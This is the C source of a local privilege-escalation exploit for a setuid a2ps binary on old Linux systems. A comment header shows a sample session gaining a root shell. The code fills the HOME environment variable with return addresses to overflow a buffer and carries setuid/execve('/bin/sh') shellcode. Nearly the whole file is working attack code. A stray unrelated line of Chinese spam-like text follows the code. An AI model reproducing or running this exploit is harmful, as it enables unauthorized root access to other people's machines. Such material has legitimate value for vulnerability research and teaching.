/* * * /usr/bin/a2ps exploit by lizard / lizstyle[at]gmail[dot]com * NOT suid by default =\ * * * [lizard@testbox lizard]$ ls -alF `which a2ps` * -rwsr-sr-x 1 root root 324408 Aug 5 2002 /usr/bin/a2ps* * [lizard@testbox lizard]$ gcc -O3 -o a2ps a2ps.c * [lizard@testbox lizard]$ id * uid=500(lizard) gid=500(lizard) groups=500(lizard) * [lizard@testbox lizard]$ ./a2ps * [*] 0xbfffffce * sh-2.05b# id * uid=0(root) gid=500(lizard) groups=500(lizard) * sh-2.05b# uname -a * Linux testbox 2.4.18-14 #1 Wed Sep 4 12:13:11 EDT 2002 i686 athlon i386 GNU/Linux * sh-2.05b# * * thanks go to slider,trog */ #include #include #include #define A2PS "/usr/bin/a2ps" #define DEFRET 0xbffffffa - strlen(sc) - strlen(A2PS) #define xnullbitch 1100 //shellcode by man shadow //setuid(0) and exec /bin/sh hellcode char sc[] = "\x31\xC9" /* xor ecx,ecx */ "\x31\xDB" /* xor ebx,ebx */ "\x6A\x46" /* push byte 70 */ "\x58" /* pop eax */ "\xCD\x80" /* int 80h */ "\x51" /* push ecx */ "\x68\x2F\x2F\x73\x68" /* push 0x68732F2F */ "\x68\x2F\x62\x69\x6E" /* push 0x6E69622F */ "\x89\xE3" /* mov ebx,esp */ "\x51" /* push ecx */ "\x53" /* push ebx */ "\x89\xE1" /* mov ecx,esp */ "\x99" /* cdq */ "\xB0\x0B" /* mov al,11 */ "\xCD\x80"; /* int 80h */ int main(void) { int ctr = 0; char buffer[xnullbitch]; fprintf(stdout, "[*] 0x%8x\n", (long) DEFRET); for(ctr = 0; ctr < xnullbitch - 1; ctr += 4) *(long *) &buffer[ctr] = (long) DEFRET; buffer[xnullbitch - 1] = '\0'; if((setenv("HOME", buffer, 1)) == -1) { perror("setenv()"); exit(1); } if((setenv("TOPX", sc, 1)) == -1) { perror("setenv()"); exit(1); } if((execl(A2PS, A2PS, NULL)) == -1) { perror("execl()"); exit(1); } return(0); }

亚洲欧美在线